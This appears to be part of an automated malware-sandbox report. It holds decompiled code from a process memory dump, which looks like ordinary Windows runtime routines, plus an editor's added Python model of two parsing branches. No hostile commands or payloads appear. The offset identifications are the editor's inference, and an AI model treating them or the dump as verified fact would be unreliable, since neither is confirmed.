                                              						_t88 = E0102500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                              						_t119 = _t119 + 0x1c;
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                              						if(_t88 < 0) {
                                              							goto L29;
                                              						}
                                              						_t101 = _t118 - 0x3c;
                                              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                              						goto L21;
                                              					}
                                               					_t67 = 0xc0000017; // STATUS_NO_MEMORY: heap allocation failed
                                              					goto L28;
                                              				}
                                              				_push(0);
                                              				_push(0x20);
                                              				_push(_t118 - 0x60);
                                               				_push(0x5a); // SystemBootEnvironmentInformation (class 90) into the 0x20-byte buffer at ebp-0x60
                                              				_t94 = E00FE9860();
                                              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                              				if(_t94 < 0) {
                                              					goto L29;
                                              				}
                                               				if( *((intOrPtr*)(_t118 - 0x50)) == 1) { // FirmwareType at +0x10 of that buffer: 1 = FirmwareBios, 2 = FirmwareUefi
                                              					_t101 = L"Legacy";
                                              					_push(6);
                                              				} else {
                                              					_t101 = L"UEFI";
                                              					_push(4);
                                              				}
                                              				_pop(_t65);
                                              				goto L21;
                                               			}

                                               Per-line instruction addresses for E010251BE (the report's address column beside the C-Code above, flattened by extraction): 0x010251be to 0x010253bf.

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: 60b738e46c2c5344ce1c5c15c7490da33cd768f1938d395563ebb3ff595b9e4e
                                              • Instruction ID: c0fb75550857f3ec9758cff975de0e1d09d40db1e484b1482e17d0452548bf76
                                              • Opcode Fuzzy Hash: 60b738e46c2c5344ce1c5c15c7490da33cd768f1938d395563ebb3ff595b9e4e
                                              • Instruction Fuzzy Hash: B6515C71A006199FDB24DFA88D40BEDBBF8FF49700F14806DE689EB291D7719900DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%
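The decompilation of E010251BE above selects one of four strings depending on __ecx: the current directory (case 0), the image path (case 1), a decimal processor count (case 2) and "Legacy" or "UEFI" (case 3), then copies it into a caller-supplied UTF-16 buffer or reports the required length. The following is an added example by the editor, not code from the report, the sample or ntdll. It re-implements the two data-dependent branches and the common copy-out tail in Python against constructed buffers, using the public structure layouts that fit the constants in the decompilation: SYSTEM_BOOT_ENVIRONMENT_INFORMATION (FirmwareType at +0x10) for the 0x5a query, and a RelationGroup SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX record (ActiveGroupCount at +0xa, GroupInfo[] at +0x20 with 0x2c-byte 32-bit entries) for the 0x6b query. Those identifications are the editor's reading of the offsets; the byte buffers are constructed test data, not memory captured from the sample.

```python
"""Added example: what E010251BE's __ecx == 2 / __ecx == 3 branches parse,
and how its L21..L28 tail hands the result back. Editor's code, not the
report's; buffers are constructed, not captured."""
import struct
from typing import Optional, Tuple

STATUS_SUCCESS = 0x00000000
STATUS_BUFFER_TOO_SMALL = 0xC0000023  # the 0xc0000023 at label L27

# FIRMWARE_TYPE values (public enum)
FIRMWARE_BIOS = 1
FIRMWARE_UEFI = 2

# GROUP_RELATIONSHIP inside SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX, 32-bit layout,
# matching the +0xa / +0x21 / 0x2c constants in the decompilation
ACTIVE_GROUPS_OFFSET = 0x0A  # ActiveGroupCount (WORD)
GROUP_INFO_OFFSET = 0x20     # GroupInfo[] array
GROUP_INFO_SIZE = 0x2C       # sizeof(PROCESSOR_GROUP_INFO) with a 4-byte KAFFINITY
ACTIVE_COUNT_OFFSET = 0x01   # PROCESSOR_GROUP_INFO.ActiveProcessorCount (BYTE)


def firmware_type_string(boot_env: bytes) -> str:
    """__ecx == 3: the 0x20-byte buffer at ebp-0x60 is SYSTEM_BOOT_ENVIRONMENT_INFORMATION;
    ebp-0x50 is its FirmwareType member at +0x10, after the 16-byte BootIdentifier GUID."""
    if len(boot_env) < 0x14:
        raise ValueError("buffer too short for FirmwareType")
    (firmware_type,) = struct.unpack_from("<I", boot_env, 0x10)
    return "Legacy" if firmware_type == FIRMWARE_BIOS else "UEFI"


def active_processor_count(group_rel: bytes) -> int:
    """__ecx == 2: the loop `while _t106 < *(buf+0xa)` sums `*(buf + 0x21 + i*0x2c)`,
    i.e. GroupInfo[i].ActiveProcessorCount over every active processor group."""
    (active_groups,) = struct.unpack_from("<H", group_rel, ACTIVE_GROUPS_OFFSET)
    if len(group_rel) < GROUP_INFO_OFFSET + active_groups * GROUP_INFO_SIZE:
        raise ValueError("buffer shorter than ActiveGroupCount implies")
    total = 0
    for i in range(active_groups):
        total += group_rel[GROUP_INFO_OFFSET + i * GROUP_INFO_SIZE + ACTIVE_COUNT_OFFSET]
    return total


def copy_out(value: str, out_chars: Optional[int]) -> Tuple[int, int, Optional[str]]:
    """Common tail L21..L28: returns (status, value stored through the length pointer,
    string written). out_chars is the caller's capacity in UTF-16 units; None models
    a NULL destination (_t108 == 0)."""
    n = len(value)
    if out_chars is None:
        return STATUS_BUFFER_TOO_SMALL, n + 1, None      # L27: required length incl. terminator
    if n >= out_chars:                                    # no room for value plus terminator
        return STATUS_BUFFER_TOO_SMALL, n + 1, "" if out_chars >= 1 else None
    return STATUS_SUCCESS, n, value                       # memcpy of n*2 bytes, then dst[n] = 0


def build_boot_env(firmware_type: int) -> bytes:
    """Constructed SYSTEM_BOOT_ENVIRONMENT_INFORMATION: GUID, FirmwareType, BootFlags, padded to 0x20."""
    return b"\x11" * 16 + struct.pack("<IQ", firmware_type, 0) + b"\0" * 4


def build_group_relationship(active_counts) -> bytes:
    """Constructed RelationGroup record with one PROCESSOR_GROUP_INFO per entry:
    Relationship=4, Size, MaximumGroupCount, ActiveGroupCount, Reserved[20], GroupInfo[]."""
    size = GROUP_INFO_OFFSET + len(active_counts) * GROUP_INFO_SIZE
    hdr = struct.pack("<IIHH", 4, size, len(active_counts), len(active_counts)) + b"\0" * 20
    body = b"".join(bytes([64, n]) + b"\0" * 38 + struct.pack("<I", (1 << n) - 1)
                    for n in active_counts)
    return hdr + body
```

Two details of the tail are worth noticing when reading the decompilation: a value that fits exactly (length equal to capacity) is still rejected with STATUS_BUFFER_TOO_SMALL because the function insists on room for the terminator, and the length it reports in that case already includes the terminator, whereas on success the reported length excludes it.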

                                              C-Code - Quality: 78%
                                              			E00FAB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                              				signed int _t65;
                                              				signed short _t69;
                                              				intOrPtr _t70;
                                              				signed short _t85;
                                              				void* _t86;
                                              				signed short _t89;
                                              				signed short _t91;
                                              				intOrPtr _t92;
                                              				intOrPtr _t97;
                                              				intOrPtr* _t98;
                                              				signed short _t99;
                                              				signed short _t101;
                                              				void* _t102;
                                              				char* _t103;
                                              				signed short _t104;
                                              				intOrPtr* _t110;
                                              				void* _t111;
                                              				void* _t114;
                                              				intOrPtr* _t115;
                                              
                                              				_t109 = __esi;
                                              				_t108 = __edi;
                                              				_t106 = __edx;
                                              				_t95 = __ebx;
                                              				_push(0x90);
                                              				_push(0x107f7a8);
                                              				E00FFD0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                               				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18]; // fs:[0x18] = TEB
                                              				if(__edx == 0xffffffff) {
                                              					L6:
                                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                               					_t65 =  *(_t97 + 0xfca) & 0x0000ffff; // TEB flag word at +0xfca; bit 0x2 is a re-entrancy guard, set below and cleared on every exit path
                                              					__eflags = _t65 & 0x00000002;
                                              					if((_t65 & 0x00000002) != 0) {
                                              						L3:
                                              						L4:
                                              						return E00FFD130(_t95, _t108, _t109);
                                              					}
                                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                              					_t108 = 0;
                                              					_t109 = 0;
                                              					_t95 = 0;
                                              					__eflags = 0;
                                              					while(1) {
                                              						__eflags = _t95 - 0x200;
                                              						if(_t95 >= 0x200) {
                                              							break;
                                              						}
                                              						E00FED000(0x80);
                                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                              						_t108 = _t115;
                                              						_t95 = _t95 - 0xffffff80;
                                              						_t17 = _t114 - 4;
                                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                              						__eflags =  *_t17;
                                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                              						_t102 = _t110 + 1;
                                              						do {
                                              							_t85 =  *_t110;
                                              							_t110 = _t110 + 1;
                                              							__eflags = _t85;
                                              						} while (_t85 != 0);
                                              						_t111 = _t110 - _t102;
                                              						_t21 = _t95 - 1; // -129
                                              						_t86 = _t21;
                                              						__eflags = _t111 - _t86;
                                              						if(_t111 > _t86) {
                                              							_t111 = _t86;
                                              						}
                                              						E00FEF3E0(_t108, _t106, _t111);
                                              						_t115 = _t115 + 0xc;
                                              						_t103 = _t111 + _t108;
                                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                              						_t89 = _t95 - _t111;
                                              						__eflags = _t89;
                                              						_push(0);
                                              						if(_t89 == 0) {
                                              							L15:
                                               							_t109 = 0xc000000d; // STATUS_INVALID_PARAMETER
                                              							goto L16;
                                              						} else {
                                              							__eflags = _t89 - 0x7fffffff;
                                              							if(_t89 <= 0x7fffffff) {
                                              								L16:
                                              								 *(_t114 - 0x94) = _t109;
                                              								__eflags = _t109;
                                              								if(_t109 < 0) {
                                              									__eflags = _t89;
                                              									if(_t89 != 0) {
                                              										 *_t103 = 0;
                                              									}
                                              									L26:
                                              									 *(_t114 - 0xa0) = _t109;
                                              									 *(_t114 - 4) = 0xfffffffe;
                                              									__eflags = _t109;
                                              									if(_t109 >= 0) {
                                              										L31:
                                              										_t98 = _t108;
                                              										_t39 = _t98 + 1; // 0x1
                                              										_t106 = _t39;
                                              										do {
                                              											_t69 =  *_t98;
                                              											_t98 = _t98 + 1;
                                              											__eflags = _t69;
                                              										} while (_t69 != 0);
                                              										_t99 = _t98 - _t106;
                                              										__eflags = _t99;
                                              										L34:
                                              										_t70 =  *[fs:0x30];
                                              										__eflags =  *((char*)(_t70 + 2));
                                               										if( *((char*)(_t70 + 2)) != 0) { // PEB+2 = BeingDebugged
                                              											L40:
                                               											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006; // DBG_PRINTEXCEPTION_C: the formatted string is delivered by raising an exception
                                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                              											 *(_t114 - 4) = 1;
                                              											_push(_t114 - 0x74);
                                              											L00FFDEF0(_t99, _t106);
                                              											 *(_t114 - 4) = 0xfffffffe;
                                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                              											goto L3;
                                              										}
                                               										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3; // 0x7ffe02d4 = KUSER_SHARED_DATA.KdDebuggerEnabled; unless both low bits are set, fall back to the exception path
                                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                              											goto L40;
                                              										}
                                              										_push( *((intOrPtr*)(_t114 + 8)));
                                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                              										_push(_t99 & 0x0000ffff);
                                              										_push(_t108);
                                              										_push(1);
                                              										_t101 = E00FEB280();
                                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                              										if( *((char*)(_t114 + 0x14)) == 1) {
                                              											__eflags = _t101 - 0x80000003;
                                              											if(_t101 == 0x80000003) {
                                              												E00FEB7E0(1);
                                              												_t101 = 0;
                                              												__eflags = 0;
                                              											}
                                              										}
                                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                              										goto L4;
                                              									}
                                              									__eflags = _t109 - 0x80000005;
                                              									if(_t109 == 0x80000005) {
                                              										continue;
                                              									}
                                              									break;
                                              								}
                                              								 *(_t114 - 0x90) = 0;
                                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                              								_t91 = E00FEE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                              								_t115 = _t115 + 0x10;
                                              								_t104 = _t91;
                                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                              								__eflags = _t104;
                                              								if(_t104 < 0) {
                                              									L21:
                                              									_t109 = 0x80000005;
                                              									 *(_t114 - 0x90) = 0x80000005;
                                              									L22:
                                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                              									L23:
                                              									 *(_t114 - 0x94) = _t109;
                                              									goto L26;
                                              								}
                                              								__eflags = _t104 - _t92;
                                              								if(__eflags > 0) {
                                              									goto L21;
                                              								}
                                              								if(__eflags == 0) {
                                              									goto L22;
                                              								}
                                              								goto L23;
                                              							}
                                              							goto L15;
                                              						}
                                              					}
                                              					__eflags = _t109;
                                              					if(_t109 >= 0) {
                                              						goto L31;
                                              					}
                                              					__eflags = _t109 - 0x80000005;
                                              					if(_t109 != 0x80000005) {
                                              						goto L31;
                                              					}
                                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                              					_t38 = _t95 - 1; // -129
                                              					_t99 = _t38;
                                              					goto L34;
                                              				}
                                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                              					__eflags = __edx - 0x65;
                                              					if(__edx != 0x65) {
                                              						goto L2;
                                              					}
                                              					goto L6;
                                              				}
                                              				L2:
                                              				_push( *((intOrPtr*)(_t114 + 8)));
                                              				_push(_t106);
                                              				if(E00FEA890() != 0) {
                                              					goto L6;
                                              				}
                                              				goto L3;
                                              			}

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: _vswprintf_s
                                              • String ID:
                                              • API String ID: 677850445-0

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FCB9A5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 885266447-0

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: PATH
                                              • API String ID: 0-1036084923

                                              Strings
                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0101BE0F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                              • API String ID: 0-865735534

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Re-Waiting
                                              • API String ID: 0-316354757

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryName
                                              • API String ID: 0-215506332

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: WindowsExcludedProcs
                                              • API String ID: 0-3583428290

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691

                                              Strings
                                              • Critical error detected %lx, xrefs: 01058E21
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Critical error detected %lx
                                              • API String ID: 0-802127002
                                              • Opcode ID: e54c16e362fe3cebc873b68a18b0d79a267221c98c4c16fb20e44fb5aa24af4b
                                              • Instruction ID: 29f2fc5dd5446e3cc604be350983eb5c99c440754e8c8d200076ce1963a2bb45
                                              • Opcode Fuzzy Hash: e54c16e362fe3cebc873b68a18b0d79a267221c98c4c16fb20e44fb5aa24af4b
                                              • Instruction Fuzzy Hash: 4911AD71D04348DBDF25DFA989067EDBBB1BF04310F20825EE9A96B2A2C3340601EF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0103FF60
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                              • API String ID: 0-1911121157
                                              • Opcode ID: dc4ef037cb94169779d06b1af8e846af12036e01900723fc793ef4d07f6e16d6
                                              • Instruction ID: 33a45d0ded1e3f6a6f3e6eba89f0312dc335e920f57dc785d7d3f0dd45b1d48b
                                              • Opcode Fuzzy Hash: dc4ef037cb94169779d06b1af8e846af12036e01900723fc793ef4d07f6e16d6
                                              • Instruction Fuzzy Hash: 4111E171910148EFEF62EB54CC49F98BBB2BF44714F148094F6496B2A1C7399940EB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 702924c0ae01d74e6a7b6efccfc3c7215289ab0a62cd8b7a263f4cf970c5164b
                                              • Instruction ID: e7ce5ac61d441f9dfd2395dce97282e8276913c7dba6d8a88732b50a2481031d
                                              • Opcode Fuzzy Hash: 702924c0ae01d74e6a7b6efccfc3c7215289ab0a62cd8b7a263f4cf970c5164b
                                              • Instruction Fuzzy Hash: AE424871D006298FEB64CF68C881BA9BBF1FF49304F1481EAD98DAB242D7359985CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5d7dbc7437f4f94bf3811afec64312b879c26ec83964dfbf1f381554c4876cb
                                              • Instruction ID: a1878288246bbdebd9b97f62bcf65f298ced8922cda3a443e262be1ead325610
                                              • Opcode Fuzzy Hash: f5d7dbc7437f4f94bf3811afec64312b879c26ec83964dfbf1f381554c4876cb
                                              • Instruction Fuzzy Hash: 40F1AE719082528FD729CF19C592B7AB7E1FF88714F14496EF886C7290E734E881EB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 334f0a89cf16c8adb20fc7befeb5719b00b52a95fd06ca1b54e4efd7efa47faa
                                              • Instruction ID: 4589d76b3e6db098b771ba5a645be40f6ec82a665b06edf2c52aba9eb826ff1f
                                              • Opcode Fuzzy Hash: 334f0a89cf16c8adb20fc7befeb5719b00b52a95fd06ca1b54e4efd7efa47faa
                                              • Instruction Fuzzy Hash: EAF11432A083419FE7A5CF28C84076A77E2AFD6324F18855EF8959B345D739D840EBD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 98682b39720dc9cf23a7beb24d4d8cb6837dd1a958673da19b9bb6f3037d1504
                                              • Instruction ID: f4d058f0d8f3b3266392d387241ec3fd6baf29d7554accaf6595f177a0c2cfc9
                                              • Opcode Fuzzy Hash: 98682b39720dc9cf23a7beb24d4d8cb6837dd1a958673da19b9bb6f3037d1504
                                              • Instruction Fuzzy Hash: 45E1F335A003598FEB35CF1AC990BE9B7B2BF41314F1441E9E94997291EB34AD81EF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d90f51fcbf921a25a8dc3debed6711b7a7e88679417b6c15427b47273e9069ae
                                              • Instruction ID: 2461b1f69547d26b21d27aadef596b289291e3661e2adfba2be0341c7e455001
                                              • Opcode Fuzzy Hash: d90f51fcbf921a25a8dc3debed6711b7a7e88679417b6c15427b47273e9069ae
                                              • Instruction Fuzzy Hash: 22B17F71E00209DFDB15DF9AC994BEDBBBABF84344F204129E505AB246DB74AC46DF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a23b3ff0c8df5bdefdf5a8a18e6470e5fd026e5a3f33d43d40015a61f04b15f9
                                              • Instruction ID: 5a92ba7a40caa23a44f6b0218a2423954d4748c923a475da065530632e22a855
                                              • Opcode Fuzzy Hash: a23b3ff0c8df5bdefdf5a8a18e6470e5fd026e5a3f33d43d40015a61f04b15f9
                                              • Instruction Fuzzy Hash: 52C121755083808FD354CF28C980A5AFBE1BF88704F188AAEF9D98B352D775E945DB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9de617459f4fb40ce43bba85f75a19acc88f063e4f23a09cca475de001f8335e
                                              • Instruction ID: 5861aaa5b76e265ceac1ce5ff68e5e9fd02b36a1b45964f00fc42426e5514532
                                              • Opcode Fuzzy Hash: 9de617459f4fb40ce43bba85f75a19acc88f063e4f23a09cca475de001f8335e
                                              • Instruction Fuzzy Hash: BD912831E002559BEF31EB68CC44BAD7BE5AB01724F190266FA91E73E5DB789C00DB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c61b6739754f5d2ab8297ff63b2af590a309e46b148049ea25a5a29b71c716c
                                              • Instruction ID: abaa12493985ae1dc293f2b653b2e8a7348f5604a33016e9208909f6afec5a4b
                                              • Opcode Fuzzy Hash: 2c61b6739754f5d2ab8297ff63b2af590a309e46b148049ea25a5a29b71c716c
                                              • Instruction Fuzzy Hash: 7D81A3766042418FDB62CE58C881B6F77E5FB84350F14485EFE859B249D738ED44CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction ID: 2338a6f9662008e016e9fb7c70cb0cf1df1ff84dbdd5f8a3b99227b78bbbcafe
                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction Fuzzy Hash: E8717C71A0021AEFCB11DFA9C984FEEBBB9FF48700F104069E945E7251DB34AA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7a14c37e26711cce6aff5a32ba78ccd1c89f0095a1b17ac53f096651febb350f
                                              • Instruction ID: 3db52eb19e15b0293c48cf6c8749fc6cd8ac11b0e2f24b3d939831bac86ea02c
                                              • Opcode Fuzzy Hash: 7a14c37e26711cce6aff5a32ba78ccd1c89f0095a1b17ac53f096651febb350f
                                              • Instruction Fuzzy Hash: D8712332200B01AFE732DF19CC45F6ABBE9EF80728F15452CE695872A1DBB5E941DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: def4a32a7063d62d850f032df12c56a54c714de2cc083f317fc4db61e183c180
                                              • Instruction ID: 1a6409f8335c0e7b991df443443b95e570037c95aa1bbbdf0a83f06ce58b930e
                                              • Opcode Fuzzy Hash: def4a32a7063d62d850f032df12c56a54c714de2cc083f317fc4db61e183c180
                                              • Instruction Fuzzy Hash: 6251DFB11097829BD722EF29CC46B67BBE4FF40710F14091EF49587692E774E804EB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de15ad7d407eacf166869e94ac5fc1002d17258f682ed5433fb1181a6015ac09
                                              • Instruction ID: bb67cccb3b7a39894257f0fc0fc410aa6414defeae8065b32c695e4be70d8e4e
                                              • Opcode Fuzzy Hash: de15ad7d407eacf166869e94ac5fc1002d17258f682ed5433fb1181a6015ac09
                                              • Instruction Fuzzy Hash: 5951AE76A001158FCB58DF1CC8909BDB7B2FBE8700719845BE8969B314D775AE41EBD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a472b59979a9940ffd5117165b84331fe4a1cfb8b1802ffce7661160a466963
                                              • Instruction ID: 4fd7d7d6d5dc073f89b1457aa564db3e5c4ef54945b148e63e13c3dc8b3bd291
                                              • Opcode Fuzzy Hash: 0a472b59979a9940ffd5117165b84331fe4a1cfb8b1802ffce7661160a466963
                                              • Instruction Fuzzy Hash: 0A41D3B1700211DBE726AB69C894B7BB7DEAF84720F048259F996A72D1DB34D801C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
